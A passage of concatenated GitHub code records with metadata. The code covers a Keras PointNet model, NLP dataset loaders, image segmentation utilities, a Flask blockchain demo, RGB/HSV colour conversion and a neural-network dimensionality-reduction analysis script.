1.唤醒并继续执行\n# 2.发送一个信息到生成器内部\n","repo_name":"hqs2212586/startMyPython3.0","sub_path":"第三章-文件操作和函数/函数/函数生成器2.py","file_name":"函数生成器2.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3581138796","text":"\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n\n\"\"\"\n### Build a model\nEach convolution and fully-connected layer (with exception for end layers) consits of\nConvolution / Dense -> Batch Normalization -> ReLU Activation.\n\"\"\"\n\n\ndef conv_bn(x, filters):\n x = layers.Conv1D(filters, kernel_size=1, padding=\"valid\")(x)\n x = layers.BatchNormalization(momentum=0.0)(x)\n return layers.Activation(\"relu\")(x)\n\n\ndef dense_bn(x, filters):\n x = layers.Dense(filters)(x)\n x = layers.BatchNormalization(momentum=0.0)(x)\n return layers.Activation(\"relu\")(x)\n\n\n\"\"\"\nPointNet consists of two core components. The primary MLP network, and the transformer\nnet (T-net). The T-net aims to learn an affine transformation matrix by its own mini\nnetwork. The T-net is used twice. The first time to transform the input features (n, 3)\ninto a canonical representation. The second is an affine transformation for alignment in\nfeature space (n, 3). As per the original paper we constrain the transformation to be\nclose to an orthogonal matrix (i.e. ||X*X^T - I|| = 0).\n\"\"\"\n\n\nclass OrthogonalRegularizer(keras.regularizers.Regularizer):\n def __init__(self, num_features, l2reg=0.001):\n self.num_features = num_features\n self.l2reg = l2reg\n self.eye = tf.eye(num_features)\n\n def __call__(self, x):\n x = tf.reshape(x, (-1, self.num_features, self.num_features))\n xxt = tf.tensordot(x, x, axes=(2, 2))\n xxt = tf.reshape(xxt, (-1, self.num_features, self.num_features))\n return tf.reduce_sum(self.l2reg * tf.square(xxt - self.eye))\n\n\n\"\"\"\n We can then define a general function to build T-net layers.\n\"\"\"\n\n\ndef tnet(inputs, num_features):\n\n # Initalise bias as the indentity matrix\n bias = keras.initializers.Constant(tf.reshape(tf.eye(num_features),[-1,1]))\n reg = OrthogonalRegularizer(num_features)\n\n x = conv_bn(inputs, 32)\n x = conv_bn(x, 64)\n x = conv_bn(x, 512)\n x = layers.GlobalMaxPooling1D()(x)\n x = dense_bn(x, 256)\n x = dense_bn(x, 128)\n x = layers.Dense(\n num_features * num_features,\n kernel_initializer=\"zeros\",\n bias_initializer=bias,\n activity_regularizer=reg,\n )(x)\n feat_T = layers.Reshape((num_features, num_features))(x)\n # Apply affine transformation to input features\n return layers.Dot(axes=(2, 1))([inputs, feat_T])\n\n\n\"\"\"\nThe main network can be then implemented in the same manner where the t-net mini models\ncan be dropped in a layers in the graph. Here we replicate the network architecture\npublished in the original paper but with half the number of weights at each layer as we\nare using the smaller 10 class ModelNet dataset.\n\"\"\"\ndef pointnet(num_points, num_class):\n inputs = keras.Input(shape=(num_points, 3))\n\n x = tnet(inputs, 3)\n x = conv_bn(x, 32)\n x = conv_bn(x, 32)\n x = tnet(x, 32)\n x = conv_bn(x, 32)\n x = conv_bn(x, 64)\n x = conv_bn(x, 512)\n x = layers.GlobalMaxPooling1D()(x)\n x = dense_bn(x, 256)\n x = layers.Dropout(0.3)(x)\n x = dense_bn(x, 128)\n x = layers.Dropout(0.3)(x)\n\n outputs = layers.Dense(num_class, activation=\"softmax\")(x)\n\n model = keras.Model(inputs=inputs, outputs=outputs, name=\"pointnet\")\n\n return model\n","repo_name":"YipengHu/MPHY0043","sub_path":"tutorials/pointset/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"32879671828","text":"import re\nimport numpy as np\nimport torch\n\ndef clean_str(text,TREC=False):\n\treturn text\n\n\ndatapath = '../Datasets/'\nvecpath = '../glove.840B.300d.txt'\n\ndef loadrt():\n\tcorpus = []\n\tposcount = 0\n\tnegcount = 0\n\twith open(datapath+'rt-polarity/rt-polarity.pos','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tposcount+=1\n\n\twith open(datapath+'rt-polarity/rt-polarity.neg','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tnegcount+=1\n\n\tlabels = np.zeros(poscount+negcount)\n\tlabels[:poscount] = 1\n\tprint(\"Training Data Loaded \")\n\treturn corpus,labels\n\n\ndef loadso():\n\tcorpus = []\n\tposcount = 0\n\tnegcount = 0\n\twith open(datapath+'Subj_Obj/plot.tok.gt9.5000','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tposcount+=1\n\n\twith open(datapath+'Subj_Obj/quote.tok.gt9.5000','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tnegcount+=1\n\n\tlabels = np.zeros(poscount+negcount)\n\tlabels[:poscount] = 1\n\treturn corpus,labels\n\n\ndef loadmpqa():\n\tcorpus = []\n\tposcount = 0\n\tnegcount = 0\n\twith open(datapath+'mpqa/mpqa.pos','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tposcount+=1\n\n\twith open(datapath+'mpqa/mpqa.neg','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tnegcount+=1\n\n\tlabels = np.zeros(poscount+negcount)\n\tlabels[:poscount] = 1\n\treturn corpus,labels\n\n\ndef loadcr():\n\tcorpus = []\n\tposcount = 0\n\tnegcount = 0\n\twith open(datapath+'cr/custrev.pos','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tposcount+=1\n\n\twith open(datapath+'cr/custrev.neg','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tnegcount+=1\n\n\tlabels = np.zeros(poscount+negcount)\n\tlabels[:poscount] = 1\n\treturn corpus,labels\n\n\ndef loadtrec():\n\tlab = {'DESC':0,'ENTY':1,'ABBR':2,'HUM':3,'LOC':4,'NUM':5}\n\n\tXtrain = []\n\tytrain = []\n\twith open(datapath+'TREC/train.txt','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\twords = line.split()\n\t\t\tlabel = words[0][0:words[0].find(\":\")]\n\t\t\tsentence = \" \".join(words[1:])\n\t\t\tytrain.append(int(lab[label]))\n\t\t\tXtrain.append(clean_str(sentence,True))\n\n\tXtest = []\n\tytest = []\n\twith open(datapath+'TREC/test.txt','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\twords = line.split()\n\t\t\tlabel = words[0][0:words[0].find(\":\")]\n\t\t\tsentence = \" \".join(words[1:])\n\t\t\tytest.append(int(lab[label]))\n\t\t\tXtest.append(clean_str(sentence,True))\n\n\treturn Xtrain,np.asarray(ytrain),Xtest,np.asarray(ytest)\n\n\ndef load_embeddings():\n\n\tembedding_index = {}\n\twith open(vecpath,'r',encoding='utf-8') as f:\n\t\tfor line in f.readlines():\n\t\t\twords = line.split()\n\t\t\tword = words[0]\n\t\t\tvector = torch.FloatTensor(np.asarray(words[1:],'float32'))\n\t\t\tembedding_index[word] = vector\n\n\t\tembed_dim = vector.size(0)\n\n\treturn embedding_index,embed_dim","repo_name":"avinashsai/Convolutional-Neural-Networks-for-Text-Classification","sub_path":"PyTorch/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"43572257737","text":"import time\nimport os\nimport sys\nfrom typing import List\nfrom multiprocessing import Pool\n\nimport numpy as np\nfrom skimage import img_as_float\nfrom skimage.morphology import remove_small_objects\nfrom scipy.misc import imsave\n\nfrom frangi_filter import get_frangi\nfrom frangi_filter import get_thresholded\n# pylint: disable=C0413\nsys.path.append('.')\nfrom data_utils import zero_one\n\n\ndef ensure_dir_exists(dir_path):\n if not os.path.exists(dir_path):\n print('Creating', dir_path)\n os.makedirs(dir_path)\n\n\ndef segment_image(image, frangi_settings: list, small_object_threshold: int,\n image_id=None) -> np.ndarray:\n \"\"\" runs the whole segmentation pipeline\n image_id is used for caching, leave as None to disable cache\n \"\"\"\n frangi_sigma_max, frangi_beta1, frangi_beta2, frangi_threshold = frangi_settings\n\n frangi_output = get_frangi(image_id, image, [frangi_sigma_max,\n frangi_beta1, frangi_beta2])\n\n segmented = get_thresholded(frangi_output, frangi_threshold)\n\n segmented = remove_small_objects(np.round(segmented).astype(bool),\n small_object_threshold)\n\n segmented = zero_one(segmented)\n return segmented\n\n\n\ndef produce_segmentations(segment_params, images, image_names, output_dir) -> None:\n \"\"\"\n Segment each image found in images with params and save\n them to the output_folder\n image_paths should be absolute paths\n \"\"\"\n\n if not os.path.isdir(output_dir):\n print(f\"Creating {output_dir}\")\n os.makedirs(output_dir)\n\n params = np.array(segment_params)\n frangi_settings = params[:4]\n small_object_threshold = params[4]\n for photo, name in zip(images, image_names):\n seg_start = time.time()\n segmented = segment_image(photo,\n frangi_settings,\n small_object_threshold=small_object_threshold)\n print('Segmentation duration:', time.time() - seg_start)\n out_path = os.path.join(output_dir, name)\n print('Saving', out_path)\n imsave(out_path, img_as_float(segmented))\n\n\ndef segment_im_wrapper(args):\n \"\"\" convenient wrapper to convert the CMA-ES\n friendly param list into arguments that can be called\n by segment_image \"\"\"\n idx, photo, params = args\n frangi_settings = params[:4]\n object_threshold = params[4]\n return segment_image(np.array(photo), frangi_settings,\n small_object_threshold=object_threshold,\n image_id=idx)\n\n\ndef produce_segmentations_pool(segment_params, images) -> List[np.ndarray]:\n \"\"\"\n Similar to produce_segmentations but uses multiprocessing instead.\n Also this function returns the segmented images instead of saving them to disk\n \"\"\"\n inputs = []\n for i, image in enumerate(images):\n inputs.append([i, np.array(image), np.array(segment_params)])\n\n with Pool(len(images)) as pool:\n segmented_images = pool.map(segment_im_wrapper, inputs)\n assert len(segmented_images) == len(images)\n return segmented_images\n\n\ndef save_segmentations_pool(segment_params, images, image_names, output_dir) -> None:\n \"\"\"\n Similar to produce_segmentations_pool but saves them to disk\n \"\"\"\n if not os.path.isdir(output_dir):\n raise Exception(f\"{output_dir} needs to exist for segmentations to be output\")\n\n inputs = []\n for i, image in enumerate(images):\n inputs.append([i, np.array(image), np.array(segment_params)])\n\n with Pool(len(images)) as pool:\n segmented_images = pool.map(segment_im_wrapper, inputs)\n\n for image, name in zip(segmented_images, image_names):\n out_path = os.path.join(output_dir, name)\n print('Saving', out_path)\n imsave(out_path, img_as_float(image))\n","repo_name":"Abe404/segmentation_of_roots_in_soil_with_unet","sub_path":"src/frangi/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"24372538689","text":"# coding: utf-8\nimport json\nfrom flask import Flask, Response, request, jsonify\nfrom uuid import uuid4\nfrom fiblockchain.blockchain import Blockchain\n\n\n# Flask APP\napp = application = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\n\n# (global) ノードのユニークなアドレスを作成\nnode_identifire = str(uuid4()).replace('-', '')\n# blockchain = Blockchain()\nblockchain = Blockchain(\"blockchain.bak\")\n\n\n@app.route(\"/test\", methods=[\"GET\"])\ndef test():\n return Response(json.dumps({'Output': 'Hello Test'}), mimetype='application/json', status=200)\n\n\n@app.route(\"/test\", methods=['POST'])\ndef test_post():\n data = {\"Output\": \"Hello Test\"}\n return Response(json.dumps(data), mimetype='application/json', status=200)\n\n\n@app.route('/transactions/new', methods=['POST'])\ndef new_transactions():\n values = request.get_json()\n\n required = ['sender', 'recipient', 'amount']\n if not all(k in values for k in required):\n return 'Missing values', 400\n\n index = blockchain.new_tansaction(\n values['sender'],\n values['recipient'],\n values['amount'])\n\n response = {'message': f'トランザクションはブロック{index}に追加されました',\n 'Output': 'Hello Test'\n }\n return jsonify(response)\n # return Response(json.dumps(response), mimetype='application/json', status=200)\n\n\n@app.route('/mine', methods=['GET'])\ndef mine():\n # 次のプルーフを見つけるためのプルーフオブワークアルゴリズムを使用\n last_block = blockchain.last_block\n last_proof = last_block['proof']\n proof = blockchain.proof_of_work(last_proof)\n\n # プルーフを見つけたことに対する報酬を得る\n # 送信者は採掘者が新しいコインを採掘したことを表すために\"0\"とする\n blockchain.new_tansaction(\n sender=\"0\",\n recipient=node_identifire,\n amount=1,\n )\n\n # チェーンに新しいブロックを加えることで、新しいブロックを採掘する\n block = blockchain.new_block(proof)\n\n # マイニングした結果をユーザに返す\n response = {\n 'message': '新しいブロックを採掘しました',\n 'index': block['index'],\n 'transactions': block['transactions'],\n 'proof': block['proof'],\n 'previous_hash': block['previous_hash'],\n }\n\n return jsonify(response), 200\n\n\n@app.route('/chain', methods=['GET'])\ndef full_chain():\n response = {\n 'chain': blockchain.chain,\n 'length': len(blockchain.chain)\n }\n return jsonify(response), 200\n\n\n@app.route('/nodes/register', methods=['POST'])\ndef register_node():\n values = request.get_json()\n\n nodes = values.get('nodes')\n if nodes is None:\n return \"Error: 有効ではないノードのリストです\", 400\n\n for node in nodes:\n blockchain.register_node(node)\n\n response = {\n 'message': '新しいノードが追加されました',\n 'total_nodes': list(blockchain.nodes)\n }\n return jsonify(response), 201\n\n\n@app.route('/nodes/resolve', methods=['GET'])\ndef consensus():\n replaced = blockchain.resolve_conflicts()\n\n if replaced:\n response = {\n 'message': 'チェーンが置き換えられました',\n 'new_chain': blockchain.chain\n }\n else:\n response = {\n 'message': 'チェーンが確認されました',\n 'chain': blockchain.chain\n }\n\n return jsonify(response), 200\n\n\nif __name__ == \"__main__\":\n import sys\n # print(\"[EXAMPLE] python application.py 0.0.0.0 8000\")\n host = sys.argv[1]\n port = sys.argv[2]\n # print(sys.argv)\n # app.run(host=\"0.0.0.0\", port=8000, debug=True)\n app.run(host, port, True)\n","repo_name":"peace098beat/blockchain-flask","sub_path":"fiblockchain/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72306285546","text":"from PIL import Image\nimport numpy as np\n\ndef gerar_matriz_aux ( M ):\n matriz_zero = np.zeros( [ M.shape[0] , M.shape[1] , 3 ] )\n\n return matriz_zero\n\ndef rgbPixel(h, s, v):\n\n sf = float(s/100)\n vf = float(v/100)\n \n c = vf * sf\n x = c * (1 - abs((h/60)%2 - 1))\n m = vf - c\n\n r1, g1, b1 = 0, 0, 0\n if(0 <= h < 60):\n r1, g1, b1 = c, x, 0\n elif(60 <= h < 120):\n r1, g1, b1 = x, c, 0\n elif(180 <= h < 240):\n r1, g1, b1 = 0, x, c\n elif(240 <= h < 300):\n r1, g1, b1 = x, 0, c\n elif(300 <= h < 360):\n r1, g1, b1 = c, 0, x\n\n r, g ,b = ((r1+m)*255, (g1+m)*255, (b1+m)*255)\n return round(r), round(g), round(b)\n\ndef hsvPixel(r, g, b):\n r, g, b = r/255.0, g/255.0, b/255.0\n\n mx = max(r, g, b)\n mn = min(r, g, b)\n df = mx-mn\n\n if df == 0:\n h = 0\n elif mx == r: \n h = (60 * (((g-b)/df) % 6))\n elif mx == g:\n h = (60 * (((b-r)/df) + 2))\n elif mx == b:\n h = (60 * (((r-g)/df) + 4))\n if mx == 0:\n s = 0\n else:\n s = (df/mx)\n v = mx\n\n\n return round(h), int(s*100), int(v*100)\n\ndef hsvArray(imgArray):\n imgHSV = gerar_matriz_aux(imgArray)\n #img = Image.fromarray(imgArray)\n img = imgArray\n\n\n #Reescreve os pixels em HSV\n #for x in range(img.width):\n #for y in range(img.height):\n for x in range( img.shape[1] ):\n for y in range( img.shape[0] ):\n #r, g, b = img.getpixel((x, y))\n r, g, b = img[ y, x, : ]\n #print(img.getpixel((y, x)))\n #print(hsvPixel(r, g, b))\n imgHSV[x, y, :] = hsvPixel(r, g, b)\n\n return imgHSV\n\ndef rgbArray(imgHsvArray):\n rgbArray = gerar_matriz_aux(imgHsvArray)\n\n #Reescreve os pixels em RGB, convertendo pixel a pixel\n for x in range(imgHsvArray.shape[0]):\n for y in range(imgHsvArray.shape[1]):\n h, s, v = imgHsvArray[y, x, :]\n rgbArray[x, y, :] = rgbPixel(h, s, v)\n return rgbArray\n\ndef ajustarSat(imgHSV, newSat):\n\n #Cálculos em hsv\n for x in range(imgHSV.shape[0]):\n for y in range(imgHSV.shape[1]):\n h, s, v = imgHSV[x, y, :]\n #Checa se o pixel está em tom puro de cinza\n if(s == 0):\n s = s\n #Normaliza os valores e aplica a alteração de saturação\n elif(s + newSat > 100):\n s = 100\n elif(s + newSat <= 0):\n s = 1\n else:\n s = s + newSat\n imgHSV[x, y, :] = h, s, v\n\n #Converte de volta para rgb\n rgb = rgbArray(imgHSV)\n img = Image.fromarray(rgb.astype( np.uint8 ), 'RGB')\n return img \n\ndef ajustarValor(imgHSV, newVal):\n\n #Cálculos em hsv\n for x in range(imgHSV.shape[0]):\n for y in range(imgHSV.shape[1]):\n h, s, v = imgHSV[x, y, :]\n #Normaliza os valores e aplica a alteração de valor\n if(v + newVal > 100):\n v = 100\n elif(v + newVal < 0):\n v = 0\n else:\n v = v + newVal\n imgHSV[x, y, :] = h, s, v\n\n #Converte de volta para rgb\n rgb = rgbArray(imgHSV)\n img = Image.fromarray(rgb.astype( np.uint8 ), 'RGB')\n return img\n\ndef ajustarMatiz(imgHSV, newHue):\n\n #Cálculos em hsv\n for x in range(imgHSV.shape[0]):\n for y in range(imgHSV.shape[1]):\n h, s, v = imgHSV[x, y, :]\n #Aplica a alteração de matiz\n h = (h + newHue)%360\n imgHSV[x, y, :] = h, s, v\n\n #Converte de volta para rgb\n rgb = rgbArray(imgHSV)\n img = Image.fromarray(rgb.astype( np.uint8 ), 'RGB')\n return img","repo_name":"icaroslb/proc_img_ck0167","sub_path":"Processador_imagens/rgbHsv.py","file_name":"rgbHsv.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39597634786","text":"from sklearn.metrics import roc_auc_score\nfrom sklearn import metrics\nfrom sklearn.preprocessing import label_binarize\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.models import Model\nfrom keras.models import load_model\nfrom sklearn.model_selection import StratifiedKFold\nimport tensorflow as tf\nfrom sklearn.utils import resample\nimport sys\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.decomposition import PCA\nimport joblib\n\n#input_data\ninput_file=\"../data-2022-03-02.xlsx\"\n#patient_total\npatient_total=1192\n\ndefault_method=\"main analysis\"\n#default_method=\"dim_select\"\n\nif default_method == \"main analysis\":\n #if boot_stapping\n if_bootstrap=1\n bs_start=0\n total_bs_rounds=100\n # if cross_validation_test\n if_cv=0\n # if cross_validation_test and output auc for each diagnosis\n detailed_auc_trigger=0\n #neurons to iterate\n neu_start=65\n neu_end=neu_start+1\n\nif default_method == \"dim_select\":\n #if boot_stapping\n if_bootstrap=0\n bs_start=0\n total_bs_rounds=1\n # if cross_validation_test\n if_cv=0\n # if cross_validation_test and output auc for each diagnosis\n detailed_auc_trigger=0\n #neurons to iterate\n neu_start=30\n neu_end=100\n\n#stablization purpose\nseed=4\n#epochs\nepo=100\n#pre_defined_mapping of diag\nn_classes = 8\nlabels = [0, 1, 2, 3, 4, 5, 6, 7]\nid_to_disease ={0:\"MPN\",\n 1:\"MDS\",\n 2:\"MDS/MPN\",\n 3:\"CLL\",\n 4:\"AML\",\n 5:\"ALL\",\n 6:\"MM\",\n 7:\"CML\"}\ncv_out_path=\"../output/cv_stats/\"\n\nnp.random.seed(seed)\ntf.random.set_seed(seed)\nauc_for_each_diag = {}\n\nfor diag_id in range(n_classes):\n auc_for_each_diag[id_to_disease[diag_id]] = []\n\ndef mkdir(pa):\n if not os.path.exists(pa):\n os.makedirs(pa)\nmkdir(\"../output/cv_stats\")\nmkdir(\"../output/bs_data\")\nmkdir(\"../output/hidden_layer_out\")\nmkdir(\"../output/2d_full_data\")\nmkdir(\"../output/big_graph\")\nmkdir(\"../output/dim_sel\")\nmkdir(\"../output/model\")\n\n\nbs_cv_result_file = open(cv_out_path+\"cv_result.csv\", \"w\")\nbs_cv_result_file.write(\"hidden_unit,boostrapping_round,overall_auc,auc1,auc2,auc3,auc4,auc5\\n\")\n\n#generate PCA projections and draw the patient graph(raw version)\ndef pca_and_pic(filename,neu_units,sampled_bs_file,bs_round):\n hidden_layer_out_file=filename\n full_name=filename.split(\"/\")[-1]\n output_file=\"../output/2d_full_data/\"+full_name.split(\".xlsx\")[0]+\"_2d.xlsx\"\n\n #read hidden layer\n df = pd.read_excel(hidden_layer_out_file)\n x=df\n x=np.array(x)\n #PCA projection\n pca_model= PCA(n_components=2,random_state=2)\n X_reduced = pca_model.fit_transform(x)\n #save pca parameters\n joblib.dump(pca_model, \"../output/model/{}_bs{}_pca.m\".format(neu_units,bs_round))\n\n data=pd.DataFrame(X_reduced)\n data.columns=[\"0\",\"1\"]\n #add to the end of the input data for later analysis\n all_data=pd.read_excel(sampled_bs_file).copy(deep=True)\n all_data[\"X\"]=data[\"0\"]\n all_data[\"Y\"]=data[\"1\"]\n all_data.to_excel(output_file)\n #generate pictures\n gen_pic(output_file,neu_units,bs_round)\n\n\n#draw the patient graph(raw version)\ndef gen_pic(filename,neu_units,bs_round):\n df = pd.read_excel(filename)\n id_to_disease={\n 0:\"MPN\",\n 1:\"MDS\",\n 2:\"MDS/MPN\",\n 3:\"CLL\",\n 4:\"AML\",\n 5:\"ALL\",\n 6:\"MM\",\n 7:\"CML\"}\n plt.clf()\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.set_facecolor('white')\n plt.rcParams['font.sans-serif'] = ['Arial Unicode MS']\n plt.rcParams['axes.unicode_minus'] = False\n df2=df\n xx=0.3\n d=df2[df2[\"disease_id\"]==0]\n plt.scatter(d[\"X\"],d[\"Y\"],c='r',s=xx,label = id_to_disease[0])\n d=df2[df2[\"disease_id\"]==1]\n plt.scatter(d[\"X\"],d[\"Y\"],c='g',s=xx,label = id_to_disease[1])\n d=df2[df2[\"disease_id\"]==2]\n plt.scatter(d[\"X\"],d[\"Y\"],c='b',s=xx,label = id_to_disease[2])\n d=df2[df2[\"disease_id\"]==3]\n plt.scatter(d[\"X\"],d[\"Y\"],c='lime',s=xx,label = id_to_disease[3])\n d=df2[df2[\"disease_id\"]==4]\n plt.scatter(d[\"X\"],d[\"Y\"],c='#fac205',s=xx,label = id_to_disease[4])\n d=df2[df2[\"disease_id\"]==5]\n plt.scatter(d[\"X\"],d[\"Y\"],c='#a00498',s=xx,label = id_to_disease[5])\n d=df2[df2[\"disease_id\"]==6]\n plt.scatter(d[\"X\"],d[\"Y\"],c='#3af1fe',s=xx,label = id_to_disease[6])\n d=df2[df2[\"disease_id\"]==7]\n plt.scatter(d[\"X\"],d[\"Y\"],c='hotpink',s=xx,label = id_to_disease[7])\n plt.legend(markerscale=3,loc=\"upper right\", prop={'size': 7})\n plt.title(\"overview -{}\".format(neu_units))\n plt.xlabel('PC1')\n plt.ylabel('PC2')\n plt.savefig('../output/big_graph/overview_100_{}_bs_{}.jpg'.format(neu_units,bs_round), dpi=500)\n plt.close()\n#main process\nfor neu_units in range(neu_start,neu_end):\n #bootstrapping\n for current_bs_round in range(bs_start,total_bs_rounds):\n input_data = pd.read_excel(input_file)\n input_data[\"disease_id\"]=input_data[\"Diagnosis\"].replace({value:key for key, value in id_to_disease.items()})\n sampled_bootstrapping_file = \"../output/bs_data/{}.xlsx\".format(current_bs_round)\n if if_bootstrap and current_bs_round!=0:\n bootstrapSamples = resample(input_data, n_samples=patient_total, replace=1)\n bootstrapSamples.to_excel(sampled_bootstrapping_file,index=False)\n all_data=pd.read_excel(sampled_bootstrapping_file)\n else:\n all_data=input_data\n input_data.to_excel(sampled_bootstrapping_file, index=False)\n #generate training data\n X_train = all_data\n X_train = X_train.drop([\"ID\"], axis=1)\n X_train = X_train.drop([\"Diagnosis\"], axis=1)\n X_train = X_train.drop([\"Sex\"], axis=1)\n X_train = X_train.drop([\"disease_id\"], axis=1)\n X_train = X_train.drop([\"MRD (for AML)\"], axis=1)\n X_train = X_train.drop([\"2017 ELN risk score (for AML)\"], axis=1)\n X_train = X_train.drop([\"M3 (for AML)\"], axis=1)\n X_train = X_train.drop([\"2016 WHO category (for MDS)\"], axis=1)\n X_train = X_train.drop([\"IPSS-R score (for MDS)\"], axis=1)\n X_train = X_train.drop([\"CR after 6 cycles of chemotherapy (for MDS)\"], axis=1)\n X_train = X_train.drop([\"AML type\"], axis=1)\n X_train = X_train.drop([\"treatment\"], axis=1)\n \n y_train=all_data[\"disease_id\"]\n #test data is the same since we use all patients to generate the following projections\n X_test = X_train.copy(deep=True)\n y_test = y_train.copy(deep=True)\n #data for cross validation purpose\n cv_train=X_train\n cv_test=y_train\n #re-format y values to match softmax output\n y_train = pd.get_dummies(y_train)\n # train and save the model\n model = Sequential()\n model.add(Dense(100, activation='relu', input_dim=339))\n model.add(Dense(neu_units, activation='relu', input_dim=100))\n model.add(Dense(8, activation='softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n model.fit(X_train, y_train, epochs=epo, batch_size=10,shuffle=False,verbose=0)\n model.save(\"../output/model/{}_bs{}_mod.h5\".format(neu_units,current_bs_round))\n #whether to perform cross-validation on the model\n res = []\n if if_cv or (current_bs_round==0 and default_method==\"main analysis\"):\n kfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=7)\n #for cross-validation, the original data will be split into 5 folds.\n for train, test in kfold.split(cv_train, cv_test):\n # create model\n modelx = Sequential()\n cv_train = np.array(cv_train)\n cv_test = np.array(cv_test)\n modelx.add(Dense(100, activation='relu', input_dim=339))\n modelx.add(Dense(neu_units , activation='relu', input_dim=100))\n modelx.add(Dense(8, activation='softmax'))\n modelx.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n yt = pd.get_dummies(cv_test[train])\n modelx.fit(cv_train[train], yt, epochs=epo, batch_size=10,verbose=0)\n\n #to match the format\n predx = modelx.predict(cv_train[test])\n predx = [np.argmax(i) for i in predx]\n ytt = np.array(list(cv_test[test]))\n preds = label_binarize(predx, classes=labels)\n ypreds = label_binarize(ytt, classes=labels)\n #calculate AUC\n res2 = roc_auc_score(ypreds, preds, average='weighted', multi_class='ovo')\n res.append(res2)\n #whether do cross validation for each diagnosis\n if detailed_auc_trigger or current_bs_round==0:\n for p in range(len(labels)):\n tt = np.array([elem[p] for elem in list(ypreds)])\n pred_y_2 = np.array([elem[p] for elem in list(preds)])\n fpr, tpr, thresholds = metrics.roc_curve(tt,pred_y_2, pos_label=1)\n auroc = round(metrics.auc(fpr, tpr), 2)\n auc_for_each_diag[id_to_disease[p]].append(auroc)\n #general AUC for cross validation\n bs_cv_result_file.write(str(neu_units ) + \",\" +str(current_bs_round)+\",\" + str(sum(res) / 5) + \",\" + \",\".join(str(vall) for vall in res) + \"\\n\")\n #AUCrecord for cross validation on each diagnosis\n if detailed_auc_trigger or current_bs_round==0:\n cv_out=open(cv_out_path+\"units_{}_bs_{}.csv\".format(neu_units,current_bs_round),\"w\")\n cv_out.write(\"diag,round1,round2,round3,round4,round5,average\\n\")\n cv_out.write(\"Weighted AUC,\"+\",\".join(str(vall) for vall in res)+\",\"+str(sum(res) / 5)+\"\\n\")\n for each_diag in auc_for_each_diag:\n cv_out.write(each_diag+\",\"+\",\".join(str(vall) for vall in auc_for_each_diag[each_diag])+\",\"+str(sum(auc_for_each_diag[each_diag]) / 5) +\"\\n\")\n cv_out.close()\n\n #load the model to get hidden units for each patient\n model = load_model(\"../output/model/{}_bs{}_mod.h5\".format(neu_units,current_bs_round))\n m1 = Model(inputs=model.input, outputs=model.layers[1].output)\n p = m1.predict(X_test)\n filename=(\"../output/hidden_layer_out/encode_100_{}_bs_{}.xlsx\").format(neu_units,current_bs_round)\n #make sure to have index=False\n pd.DataFrame(p).to_excel(filename, index=False)\n #formatting the data to generate AUC for current round. The score is meaningless since we use all the patients to train and test\n pred = model.predict(X_test)\n pred = [np.argmax(i) for i in pred]\n y_test = np.array(list(y_test))\n pred = np.array([int(i) for i in list(pred)])\n preds = label_binarize(pred, classes=labels)\n ypreds = label_binarize(y_test, classes=labels)\n res = roc_auc_score(ypreds, preds, average='weighted', multi_class='ovo')\n print(\"hidden unit:{}, round: {}\".format(neu_units,current_bs_round))\n #get the PCA output and the patient graph.\n pca_and_pic(filename, neu_units, sampled_bootstrapping_file, current_bs_round)\n\nbs_cv_result_file.close()\n\n\n\n\n\n","repo_name":"chenjunren-ihcams/THAMP","sub_path":"src/ANN_dim_reduce.py","file_name":"ANN_dim_reduce.py","file_ext":"py","file_size_in_byte":11239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74351160746","text":"import open3d as o3d\nimport pykitti.utils as pk_utils\nimport kitti_util as utils\nimport numpy as np\nfrom calibration import Calibration\nfrom objects3d_utils import get_objects_from_label\nfrom scipy.spatial import Delaunay\nimport scipy\nfrom waymo_open_dataset.utils.box_utils import compute_num_points_in_box_3d\n#import tensorflow as tf\n\n\n# kitti\n# pc_pathname = '/media/alex/Seagate Expansion Drive/kitti/velodyne/training/velodyne/002394.bin'\n# label_pathname = '/media/alex/Seagate Expansion 